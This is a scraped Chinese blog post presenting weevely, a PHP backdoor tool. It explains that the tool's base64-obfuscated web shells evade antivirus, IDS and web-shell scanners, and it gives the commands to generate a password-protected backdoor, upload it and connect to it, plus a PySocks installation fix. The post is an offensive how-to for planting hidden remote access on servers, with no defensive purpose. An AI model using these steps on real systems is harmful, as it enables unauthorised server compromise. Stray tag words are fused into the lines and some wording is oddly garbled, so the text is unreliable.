php後門管理工具weevely

weevely是一款php後門管理工具,使用http頭進行指令傳輸,功能強大。不過只支持php。php

weevely生成的服務器端php代碼是通過了base64編碼的,因此能夠騙過主流的殺毒軟件和IDS,上傳服務器端代碼後一般能夠經過weevely直接運行。weevely所生成的PHP後門所使用的方法是如今比較主流的base64加密結合字符串變形技術,後門中所使用的函數均是經常使用的字符串處理函數,被做爲檢查規則的eval,system等函數都不會直接出如今代碼中,從而能夠導致後門文件繞事後門查找工具的檢查。使用暗組的Web後門查殺工具進行掃描,結果顯示該文件無任何威脅。python

weevely的使用很簡單,首先咱們生成一個名爲weevely.php密碼爲 321的後門:服務器

root@kali:~#weevely generate 321 /root/weevely.php  函數

將後門上傳到服務器以後運行工具

root@kali:~#weevely <url> <passwd> ui

就能連上了編碼

可是我在連的時候發現一個問題。加密

解決方案以下:url

1) Download last PySocks from python site https://pypi.python.org/pypi/PySocks/
2) Unzip archive into /tmp/ directory
3) Run "chmod 755 /tmp/PySocks/setup.py"
4) Run build "/tmp/PySocks/setup.py build"
5) Run install "/tmp/PySocks/setup.py install"
而後就能夠連上了blog

相關文章
相關標籤/搜索